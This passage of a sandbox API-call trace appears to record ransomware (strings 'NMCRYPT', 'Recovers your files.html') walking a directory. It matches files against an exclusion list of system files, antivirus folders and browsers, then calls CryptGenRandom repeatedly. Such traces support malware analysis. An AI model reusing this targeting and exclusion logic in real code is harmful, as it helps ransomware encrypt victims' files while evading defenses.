Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*ntldr*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*chrome*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*opera*") returned 0 [0161.307] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", pszSpec="*firefox*") returned 0 [0161.307] wcslen (_String="\\\\?\\") returned 0x4 [0161.307] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad138 [0161.307] wcscmp (_String1=".", _String2=".") returned 0 [0161.307] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.307] wcscmp (_String1="..", _String2=".") returned 1 [0161.307] wcscmp (_String1="..", _String2="..") returned 0 [0161.307] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*NMCRYPT") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*Recovers your files.html") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*.exe") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*.dll") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*.lnk") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*.bat") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*.ini") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*.msi") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*.scf") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*pagefile.sys*") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*NTUSER.DAT*") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*AppData*") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\winrar\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\java\\*") returned 0 [0161.307] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\windows\\*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\ESET\\*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\AVG\\*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\AVIRA\\*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*Atheros*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*Realtek*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*bootmgr*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*boot*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*boot*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*CONFIG.SYS*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*IO.SYS*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*MSDOS.SYS*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*NTDETECT.COM*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*ntldr*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*chrome*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*opera*") returned 0 [0161.308] PathMatchSpecW (pszFile="msinfo32.exe.mui", pszSpec="*firefox*") returned 0 [0161.308] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui", pszSpec="*") returned 1 [0161.308] strlen (_Str="NMoreira") returned 0x8 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 